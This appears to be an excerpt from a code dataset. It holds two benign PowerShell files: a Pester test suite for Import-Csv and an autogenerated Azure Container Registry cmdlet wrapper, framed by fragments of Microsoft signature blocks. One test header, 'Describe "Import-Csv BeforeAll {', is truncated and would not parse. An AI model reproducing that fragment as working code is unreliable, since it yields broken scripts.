BQAEggEAaATIabVCctNIv2Ns9/C4ZVfoKZ5E42WCC1+2nRg2gmS3NMOY33dqRNCn # 8/BkiHOfTTu8LNrrQyTkrhlltmpvQ8h3SwShUxmLei5nRPl5aZzSNfVvWpioTtpl # mE7mJS8FOFLkvCIIzJFd/75hqqFS4/GTHHH64eusHeEOuJmebd6RoNKjYQ3MM4wl # aSvrDZ9hQnRFMy0kb1qYgr0KSoglv9gSBB4Hvg4be7eDM95o+HsoDot+7ngFHQqj # 1LHZTZoP4reN34lcHCdmI53pXtzAaUqHrC/RLP28umRQIKS1/PzlYgoVpKYS/jve # vuqnx2vgw0CHzJ/f7oxYuzooku0/sqGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCCQ2fsrNi0NZevf2s367XYamFmFKbhmpSTa+x2bQ+3OZQIGZfHO70Zp # GBMyMDI0MDMxODE1MjQxNy43NTZaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OjA4NDItNEJFNi1DMjlBMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHajtXJWgDREbEAAQAAAdowDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNjU5WhcNMjUwMTEwMTkwNjU5WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjowODQyLTRC # RTYtQzI5QTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJOQBgh2tVFR1j8jQA4NDf8b # cVrXSN080CNKPSQo7S57sCnPU0FKF47w2L6qHtwm4EnClF2cruXFp/l7PpMQg25E # 7X8xDmvxr8BBE6iASAPCfrTebuvAsZWcJYhy7prgCuBf7OidXpgsW1y8p6Vs7sD2 # aup/0uveYxeXlKtsPjMCplHkk0ba+HgLho0J68Kdji3DM2K59wHy9xrtsYK+X9er # bDGZ2mmX3765aS5Q7/ugDxMVgzyj80yJn6ULnknD9i4kUQxVhqV1dc/DF6UBeuzf # ukkMed7trzUEZMRyla7qhvwUeQlgzCQhpZjz+zsQgpXlPczvGd0iqr7lACwfVGog # 5plIzdExvt1TA8Jmef819aTKwH1IVEIwYLA6uvS8kRdA6RxvMcb//ulNjIuGceyy # kMAXEynVrLG9VvK4rfrCsGL3j30Lmidug+owrcCjQagYmrGk1hBykXilo9YB8Qyy # 5Q1KhGuH65V3zFy8a0kwbKBRs8VR4HtoPYw9z1DdcJfZBO2dhzX3yAMipCGm6Smv # mvavRsXhy805jiApDyN+s0/b7os2z8iRWGJk6M9uuT2493gFV/9JLGg5YJJCJXI+ # yxkO/OXnZJsuGt0+zWLdHS4XIXBG17oPu5KsFfRTHREloR2dI6GwaaxIyDySHYOt # vIydla7u4lfnfCjY/qKTAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUoXyNyVE9ZhOV # izEUVwhNgL8PX0UwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBALmDVdTtuI0jAEt4 # 1O2OM8CU237TGMyhrGr7FzKCEFaXxtoqk/IObQriq1caHVh2vyuQ24nz3TdOBv7r # cs/qnPjOxnXFLyZPeaWLsNuARVmUViyVYXjXYB5DwzaWZgScY8GKL7yGjyWrh78W # JUgh7rE1+5VD5h0/6rs9dBRqAzI9fhZz7spsjt8vnx50WExbBSSH7rfabHendpeq # bTmW/RfcaT+GFIsT+g2ej7wRKIq/QhnsoF8mpFNPHV1q/WK/rF/ChovkhJMDvlqt # ETWi97GolOSKamZC9bYgcPKfz28ed25WJy10VtQ9P5+C/2dOfDaz1RmeOb27Kbeg # ha0SfPcriTfORVvqPDSa3n9N7dhTY7+49I8evoad9hdZ8CfIOPftwt3xTX2RhMZJ # CVoFlabHcvfb84raFM6cz5EYk+x1aVEiXtgK6R0xn1wjMXHf0AWlSjqRkzvSnRKz # FsZwEl74VahlKVhI+Ci9RT9+6Gc0xWzJ7zQIUFE3Jiix5+7KL8ArHfBY9UFLz4sn # boJ7Qip3IADbkU4ZL0iQ8j8Ixra7aSYfToUefmct3dM69ff4Eeh2Kh9NsKiiph58 # 9Ap/xS1jESlrfjL/g/ZboaS5d9a2fA598mubDvLD5x5PP37700vm/Y+PIhmp2fTv # uS2sndeZBmyTqcUNHRNmCk+njV3nMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjow # ODQyLTRCRTYtQzI5QTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAQqIfIYljHUbNoY0/wjhXRn/sSA2ggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOmiOvEwIhgPMjAyNDAzMTgxMjAwNDlaGA8yMDI0MDMxOTEyMDA0OVowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6aI68QIBADAHAgEAAgIZuDAHAgEAAgITDTAKAgUA # 6aOMcQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAGke6nzc/VXYtPiO0THN # 7E3wo/ZLDqnNLsh2GRzOSNx9O2Brvc5579QlbEBUeNPNVAvs80KQMRHCSd0NKlXh # ZbHQ0GW21MZWl2Sr79ZNbSabuHsU6fspPi3Cz47sM0FLeGrUp7MWUoQHF+BCcVTP # q0RtJzGST+5eGZr/3An3MLajMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHajtXJWgDREbEAAQAAAdowDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgg7DxDa/IlxF61nnFkumcOGIjUySNQpbUU9dbERoVILUwgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCAipaNpYsDvnqTe95Dj1C09020I5ljibrW/ndICOxg9 # xjCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB2o7V # yVoA0RGxAAEAAAHaMCIEIDNVZyw/kH3Kl65dpDu7rMuDyZ1X0sLRia1bHh/zg2+Z # MA0GCSqGSIb3DQEBCwUABIICAFdLzQ/yJxcCoplIzCBeZZlks9F2xRAy4A9CR+zr # h8Kg34/EvejO0BUmiQ/xIJUAZqSd4EJGGxGU4F4lwbspJub6d3PKfdVMolp0AKnM # LmYg1RxSuhOKGuY2j7Eue+nFDsyKnpnjdkMVRrCdWgvhi/B8OUnmmwa5UeZrWuFQ # gk6VL897/cgwykahGHDEO8gjLTxqCv0TwyWxTBDzf7LVJ4XuW3ZVctuv1TT5zCKQ # ZYUWVWUd3uuqyeDdgli8TeVgRE9RHn6X18/RYP78Mi8Dhej+j7aUdzzjOLtVJUMP # yozgK+jImbvWz0KHveSyb4AJE0TJ93JoQol4HGgveIV4ZeXIivLNHutYIvFeln1P # SjGgRe0uo0WlP/e95+rJxMo4a1D6gz2ERiTHayltKQXbUlb6ghCyVck5Lei5fZ5r # rmtvpRcNWU1H+aP0ZzSV3qiYCyqwOpFhEOkWaDtlKGxhdaCsslJQIeA/NlkLegv3 # q4Tai4L69pMokVsKsJKySmLSXNuIv4LXvVU9wV5WbNdNbqsPSkdy2vEA35Q4bqRv # JGtVexEnZDlDvDhM8I1d/mQADueCavrgG/wdR4XJ1BgE88f8M2YdFKuRA5cpEY2L # RgiTFKMW4p4MOO9CIuIp+l1P6lq+XNvYcrge1Lys95za8YwPFKkKrvgT5LeN1t/k # oVRo # SIG # End signature block
combined_dataset/train/non-malicious/1963.ps1
1963.ps1
Describe "Import-Csv DRT Unit Tests" -Tags "CI" { BeforeAll { $fileToGenerate = Join-Path $TestDrive -ChildPath "importCSVTest.csv" $psObject = [pscustomobject]@{ "First" = "1"; "Second" = "2" } } It "Test import-csv with a delimiter parameter" { $delimiter = ';' $psObject | Export-Csv -Path $fileToGenerate -Delimiter $delimiter $returnObject = Import-Csv -Path $fileToGenerate -Delimiter $delimiter $returnObject.First | Should -Be 1 $returnObject.Second | Should -Be 2 } It "Test import-csv with UseCulture parameter" { $psObject | Export-Csv -Path $fileToGenerate -UseCulture $returnObject = Import-Csv -Path $fileToGenerate -UseCulture $returnObject.First | Should -Be 1 $returnObject.Second | Should -Be 2 } } Describe "Import-Csv Double Quote Delimiter" -Tags "CI" { BeforeAll { $empyValueCsv = @' a1""a3 v1"v2"v3 '@ $withValueCsv = @' a1"a2"a3 v1"v2"v3 '@ $quotedCharacterCsv = @' a1,a2,a3 v1,"v2",v3 '@ } It "Should handle <name> and bind to LiteralPath from pipeline" -TestCases @( @{ name = "quote with empty value" ; expectedHeader = "a1,H1,a3"; file = "EmptyValue.csv" ; content = $empyValueCsv ; delimiter = '"' } @{ name = "quote with value" ; expectedHeader = "a1,a2,a3"; file = "WithValue.csv" ; content = $withValueCsv ; delimiter = '"' } @{ name = "value enclosed in quote" ; expectedHeader = "a1,a2,a3"; file = "QuotedCharacter.csv" ; content = $quotedCharacterCsv ; delimiter = ',' } ){ param($expectedHeader, $file, $content, $delimiter) $testPath = Join-Path $TestDrive $file Set-Content $testPath -Value $content $returnObject = Get-ChildItem -Path $testPath | Import-Csv -Delimiter $delimiter $actualHeader = $returnObject[0].psobject.Properties.name -join ',' $actualHeader | Should -BeExactly $expectedHeader $returnObject = $testPath | Import-Csv -Delimiter $delimiter $actualHeader = $returnObject[0].psobject.Properties.name -join ',' $actualHeader | Should -BeExactly $expectedHeader $returnObject = [pscustomobject]@{ LiteralPath = $testPath } | Import-Csv -Delimiter $delimiter $actualHeader = $returnObject[0].psobject.Properties.name -join ',' $actualHeader | Should -BeExactly $expectedHeader } It "Should handle <name> and bind to Path from pipeline" -TestCases @( @{ name = "quote with empty value" ; expectedHeader = "a1,H1,a3"; file = "EmptyValue.csv" ; content = $empyValueCsv ; delimiter = '"' } @{ name = "quote with value" ; expectedHeader = "a1,a2,a3"; file = "WithValue.csv" ; content = $withValueCsv ; delimiter = '"' } @{ name = "value enclosed in quote" ; expectedHeader = "a1,a2,a3"; file = "QuotedCharacter.csv" ; content = $quotedCharacterCsv ; delimiter = ',' } ){ param($expectedHeader, $file, $content, $delimiter) $testPath = Join-Path $TestDrive $file Set-Content $testPath -Value $content $returnObject = Get-ChildItem -Path $testPath | Import-Csv -Delimiter $delimiter $actualHeader = $returnObject[0].psobject.Properties.name -join ',' $actualHeader | Should -BeExactly $expectedHeader $returnObject = $testPath | Import-Csv -Delimiter $delimiter $actualHeader = $returnObject[0].psobject.Properties.name -join ',' $actualHeader | Should -BeExactly $expectedHeader $returnObject = [pscustomobject]@{ Path = $testPath } | Import-Csv -Delimiter $delimiter $actualHeader = $returnObject[0].psobject.Properties.name -join ',' $actualHeader | Should -BeExactly $expectedHeader } } Describe "Import-Csv File Format Tests" -Tags "CI" { BeforeAll { $TestImportCsv_NoHeader = Join-Path -Path (Join-Path $PSScriptRoot -ChildPath assets) -ChildPath TestImportCsv_NoHeader.csv $TestImportCsv_WithHeader = Join-Path -Path (Join-Path $PSScriptRoot -ChildPath assets) -ChildPath TestImportCsv_WithHeader.csv $TestImportCsv_W3C_ELF = Join-Path -Path (Join-Path $PSScriptRoot -ChildPath assets) -ChildPath TestImportCsv_W3C_ELF.csv $testCSVfiles = $TestImportCsv_NoHeader, $TestImportCsv_WithHeader, $TestImportCsv_W3C_ELF $orginalHeader = "Column1","Column2","Column 3" $customHeader = "test1","test2","test3" } foreach ($testCsv in $testCSVfiles) { $FileName = (Get-ChildItem $testCsv).Name Context "Next test file: $FileName" { BeforeAll { $CustomHeaderParams = @{Header = $customHeader; Delimiter = ","} if ($FileName -eq "TestImportCsv_NoHeader.csv") { $HeaderParams = @{Header = $orginalHeader; Delimiter = ","} } else { $HeaderParams = @{Delimiter = ","} } } It "Should be able to import all fields" { $actual = Import-Csv -Path $testCsv @HeaderParams $actualfields = $actual[0].psobject.Properties.Name $actualfields | Should -Be $orginalHeader } It "Should be able to import all fields with custom header" { $actual = Import-Csv -Path $testCsv @CustomHeaderParams $actualfields = $actual[0].psobject.Properties.Name $actualfields | Should -Be $customHeader } It "Should be able to import correct values" { $actual = Import-Csv -Path $testCsv @HeaderParams $actual.count | Should -Be 4 $actual[0].'Column1' | Should -BeExactly "data1" $actual[0].'Column2' | Should -BeExactly "1" $actual[0].'Column 3' | Should -BeExactly "A" } } } } Describe "Import-Csv BeforeAll { $testfile = Join-Path $TestDrive -ChildPath "testfile.csv" Remove-Item -Path $testfile -Force -ErrorAction SilentlyContinue $processlist = (Get-Process)[0..1] $processlist | Export-Csv -Path $testfile -Force -IncludeTypeInformation $expectedProcessTypes = "System.Diagnostics.Process","CSV:System.Diagnostics.Process" } It "Test import-csv import Object" { $importObjectList = Import-Csv -Path $testfile $processlist.Count | Should -Be $importObjectList.Count $importTypes = $importObjectList[0].psobject.TypeNames $importTypes.Count | Should -Be $expectedProcessTypes.Count $importTypes[0] | Should -Be $expectedProcessTypes[0] $importTypes[1] | Should -Be $expectedProcessTypes[1] } } Describe "Import-Csv with different newlines" -Tags "CI" { It "Test import-csv with '<name>' newline" -TestCases @( @{ name = "CR"; newline = "`r" } @{ name = "LF"; newline = "`n" } @{ name = "CRLF"; newline = "`r`n" } ) { param($newline) $csvFile = Join-Path $TestDrive -ChildPath $((New-Guid).Guid) $delimiter = ',' "h1,h2,h3$($newline)11,12,13$($newline)21,22,23$($newline)" | Out-File -FilePath $csvFile $returnObject = Import-Csv -Path $csvFile -Delimiter $delimiter $returnObject.Count | Should -Be 2 $returnObject[0].h1 | Should -Be 11 $returnObject[0].h2 | Should -Be 12 $returnObject[0].h3 | Should -Be 13 $returnObject[1].h1 | Should -Be 21 $returnObject[1].h2 | Should -Be 22 $returnObject[1].h3 | Should -Be 23 } }
combined_dataset/train/non-malicious/sample_14_98.ps1
sample_14_98.ps1
# ---------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code # is regenerated. # ---------------------------------------------------------------------------------- <# .Synopsis Gets the properties of the specified replication. .Description Gets the properties of the specified replication. .Example Get-AzContainerRegistryReplication -ResourceGroupName "MyResourceGroup" -RegistryName "RegistryExample" .Example Get-AzContainerRegistryReplication -ResourceGroupName "MyResourceGroup" -RegistryName "RegistryExample" -Name "replication001" .Inputs Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Models.IContainerRegistryIdentity .Outputs Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Models.Api202301Preview.IReplication .Notes COMPLEX PARAMETER PROPERTIES To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables. INPUTOBJECT <IContainerRegistryIdentity>: Identity Parameter [AgentPoolName <String>]: The name of the agent pool. [CacheRuleName <String>]: The name of the cache rule. [ConnectedRegistryName <String>]: The name of the connected registry. [CredentialSetName <String>]: The name of the credential set. [ExportPipelineName <String>]: The name of the export pipeline. [GroupName <String>]: The name of the private link resource. [Id <String>]: Resource identity path [ImportPipelineName <String>]: The name of the import pipeline. [PipelineRunName <String>]: The name of the pipeline run. [PrivateEndpointConnectionName <String>]: The name of the private endpoint connection. [RegistryName <String>]: The name of the container registry. [ReplicationName <String>]: The name of the replication. [ResourceGroupName <String>]: The name of the resource group. The name is case insensitive. [RunId <String>]: The run ID. [ScopeMapName <String>]: The name of the scope map. [SubscriptionId <String>]: The ID of the target subscription. The value must be an UUID. [TaskName <String>]: The name of the container registry task. [TaskRunName <String>]: The name of the task run. [TokenName <String>]: The name of the token. [WebhookName <String>]: The name of the webhook. .Link https://learn.microsoft.com/powershell/module/az.containerregistry/get-azcontainerregistryreplication #> function Get-AzContainerRegistryReplication { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Models.Api202301Preview.IReplication])] [CmdletBinding(DefaultParameterSetName='List', PositionalBinding=$false)] param( [Parameter(ParameterSetName='Get', Mandatory)] [Alias('ReplicationName', 'ResourceName')] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Path')] [System.String] # The name of the replication. ${Name}, [Parameter(ParameterSetName='Get', Mandatory)] [Parameter(ParameterSetName='List', Mandatory)] [Alias('ContainerRegistryName')] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Path')] [System.String] # The name of the container registry. ${RegistryName}, [Parameter(ParameterSetName='Get', Mandatory)] [Parameter(ParameterSetName='List', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Path')] [System.String] # The name of the resource group. # The name is case insensitive. ${ResourceGroupName}, [Parameter(ParameterSetName='Get')] [Parameter(ParameterSetName='List')] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')] [System.String[]] # The ID of the target subscription. # The value must be an UUID. ${SubscriptionId}, [Parameter(ParameterSetName='GetViaIdentity', Mandatory, ValueFromPipeline)] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Models.IContainerRegistryIdentity] # Identity Parameter # To construct, see NOTES section for INPUTOBJECT properties and create a hash table. ${InputObject}, [Parameter(ParameterSetName='GetByRegistry', Mandatory, ValueFromPipeline)] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Models.Api202301Preview.IRegistry] # The Registry Object. ${Registry}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Azure')] [System.Management.Automation.PSObject] # The credentials, account, tenant, and subscription used for communication with Azure. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.ContainerRegistry.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) process { if ($PSBoundParameters.ContainsKey('Registry')){ $Registry = $PSBoundParameters["Registry"] $null = $PSBoundParameters.Remove('Registry') $RegistryName = $Registry.Name $ResourceGroupName = $Registry.ResourceGroupName $null = $PSBoundParameters.Add("RegistryName", $RegistryName) $null = $PSBoundParameters.Add("ResourceGroupName", $ResourceGroupName) } . Az.ContainerRegistry.internal\Get-AzContainerRegistryReplication @PSBoundParameters } } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCKV4BWhnVFRAqL # GOVS+5a3cTErVg2MM7tTvIZEIzvA36CCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # 